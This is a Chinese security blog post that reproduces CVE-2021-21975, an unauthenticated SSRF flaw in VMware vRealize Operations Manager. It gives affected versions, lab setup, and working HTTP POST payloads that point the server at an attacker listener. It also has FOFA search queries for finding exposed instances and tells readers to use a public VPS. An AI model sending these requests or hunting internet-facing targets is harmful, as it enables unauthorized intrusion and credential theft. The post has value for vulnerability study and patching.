VMware vRealize Operations Manager SSRF漏洞复现以及原理简析（CVE-2021-21975）

VMware vRealize Operations Manager SSRF漏洞复现以及原理简析（CVE-2021-21975）
2021-04-12 17:50:08 Author: www.secpulse.com(查看原文) 阅读量:182 收藏

0x01 vRealize Operations Manager介绍

vRealize Operations Manager 是vmware官方提供的针对vmware虚拟化平台的一套运维管理解决方案。2021 年 3 月 31 日，VMware官方发布安全公告，披露了CVE-2021-21975 VMware vRealize Operations Manager API SSRF。攻击者在无需身份验证和用户交互的情况下，可利用此漏洞窃取管理凭，可直接反弹shell 。

0x02 影响版本

VMware vRealize Operations 8.3.0、8.2.0、8.1.1、8.1.0、8.0.1、8.0.0、7.5.0
VMware Cloud Foundation 4.x，3.x
vRealize Suite Lifecycle Manager 8.x

0x03 漏洞原理

由于/casa/nodes/thumbprints该路径的API网络访问权限存在漏洞。攻击者可通过vRealize Operations Manager API的网络访问权限构造恶意请求，可以执行服务器端请求伪造攻击，以窃取管理凭据。

0x04 漏洞复现

这里选择环境搭建的版本为8.3.0，师傅们有兴趣可选择其它版本复现一下。

先注册一个账号才能下载，注册地址

>https://my.vmware.com/cn/web/vmware/registration

微信截图_20210409110322.png

激活之后登录选择下载版本，下载地址

>https://my.vmware.com/zh/group/vmware/patch#search

微信截图_20210409110416.png

下载完成之后选择打开方式，打开方式选择vmware

微信截图_20210409110459.png

选择**下一步**

微信截图_20210409110551.png

选择**导入**

微信截图_20210409110625.png

等待导入成功即可

微信截图_20210409110739.png

启动该虚拟机

微信截图_20210409110811.png

踩坑了，**需要注意**

这里一定需要等待初始化的**5min17s**完成之后才可以，由于我没有初始化完成直接重启虚拟机直接废掉了，所以需要重新导入虚拟机镜像

微信截图_20210409110850.png

访问路径

>https://192.168.31.176

这里直接重定向到UI界面

微信截图_20210409110930.png

点击**快速安装**

微信截图_20210409111048.png

点击->下一步,然后设置密码

微信截图_20210409111323.png

然后点击->完成即可

微信截图_20210409111407.png

等待几分钟后成功访问index页面环境搭建成功

微信截图_20210409111453.png

0x05 漏洞利用

POC

```
POST /casa/nodes/thumbprints HTTP/1.1
Host: x.x.x.x
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Length: 36
["payload_address"]
```

所以构造poyload如下：

```
POST /casa/nodes/thumbprints HTTP/1.1
Host: 192.168.31.176
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Length: 23
["192.168.31.234:2222"]
```

修改host，查看回显

微信截图_20210409111718.png

监听2222端口查看结果

微信截图_20210409111752.png

windows下自己下载nc.exe,复现的话利用ssrf反弹shell到自己本地比较方便，有一点比较值得注意的就是poc的选择，网上的poc多多少少个别字段有些差异，刚开始反弹不到本地返回信息一直显示400和404，失败的原因就是poc选择的有问题

0x06 Fofa利用

fofa语句

>body="vRealize Operations Manager"

或者

>title="vRealize Operations Manager"

或者

>"vRealize Operations Manager"

指纹可以自己找，好用就行

微信截图_20210409111925.png

利用poc，修改payload的地址为dnslog或者公网vps，反弹shell即可

0x07 免责声明

文章仅供技术交流，任何非法使用造成的后果与本作者无关，谢谢！！！

0x08 修复建议

VMware官网已发布安全补丁，建议下载及时修复漏洞，下载地址

>https://www.vmware.com/security/advisories/VMSA-2021-0004.html

0x09 参考链接

>https://www.vmware.com/security/advisories/VMSA-2021-0004.html

本文作者：Am1azi3ng

本文为安全脉搏专栏作者发布，转载请注明：https://www.secpulse.com/archives/156723.html

文章来源: https://www.secpulse.com/archives/156723.html
如有侵权请联系:admin#unsafe.sh